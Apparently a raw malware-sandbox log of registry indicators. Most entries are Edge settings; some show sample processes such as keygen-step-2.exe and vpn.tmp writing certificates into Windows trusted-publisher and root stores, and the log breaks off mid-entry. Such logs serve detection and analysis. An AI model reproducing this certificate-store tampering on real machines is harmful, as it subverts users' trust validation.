description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" 6387974.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = dc7f0b2f612dd701 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies 6387974.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 66b34e42612dd701 MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{Q4J0B7H3-CLFC-AN4E-8Q18-7Q45PB0I3113}\1 = "2204" rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate 6387974.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{K2A7A3K0-ECRB-LM0G-2M91-3G19BV5P5669}\1 = "5324" svchost.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 89e05e42612dd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0997c12e612dd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU 6387974.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000882d553b2a36d7765a688568fded0d6fc8082b305eb45ff8a7bd0da0d57d4fff50a91699d1e2cb3544027c2fd15c413075f50410b7985bf81d9e MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 6bc7f038612dd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\NextBrowserDataLogTime = 700bae96932dd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" 6387974.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 keygen-step-2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e keygen-step-2.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B ebgk3ugky5a.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 